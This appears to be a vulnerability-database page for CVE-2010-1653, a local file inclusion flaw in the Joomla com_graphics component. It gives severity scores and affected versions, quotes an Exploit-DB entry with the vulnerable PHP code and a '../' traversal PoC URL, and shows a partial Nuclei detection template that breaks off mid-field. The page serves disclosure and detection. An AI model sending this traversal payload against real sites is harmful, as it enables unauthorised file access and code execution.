CVE-2010-1653
published 2010-05-03CVE-2010-1653: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and…
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
13.37%
95.9th percentile
Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| htmlcoderhelper | com_graphics | — | — |
| htmlcoderhelper | com_graphics | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Graphics 1.0.6 - Local File Inclusion
exploitdb·2010-04-27
CVE-2010-1653 Joomla! Component Graphics 1.0.6 - Local File Inclusion
Joomla! Component Graphics 1.0.6 - Local File Inclusion
---
Title : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
Vendor : http://htmlcoderhelper.com/
Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip
Date : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
[+] Vulnerable
./components/com_graphics/graphics.php
// Require specific controller if requested
if($controller = JRequest::getVar( 'controller' )) {
require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
}
[+] Exploit
http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_graphics&controller=../../../../../..
Nuclei
Joomla! Component Graphics 1.0.6 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-1653 [HIGH] Joomla! Component Graphics 1.0.6 - Local File Inclusion
Joomla! Component Graphics 1.0.6 - Local File Inclusion
A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
The LFI vulnerability can lead to unauthorized access to sensitive files, remote code
http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txthttp://secunia.com/advisories/39585http://www.exploit-db.com/exploits/12430http://www.securityfocus.com/bid/39743http://www.vupen.com/english/advisories/2010/1004http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txthttp://secunia.com/advisories/39585http://www.exploit-db.com/exploits/12430http://www.securityfocus.com/bid/39743http://www.vupen.com/english/advisories/2010/1004
2010-05-03
Published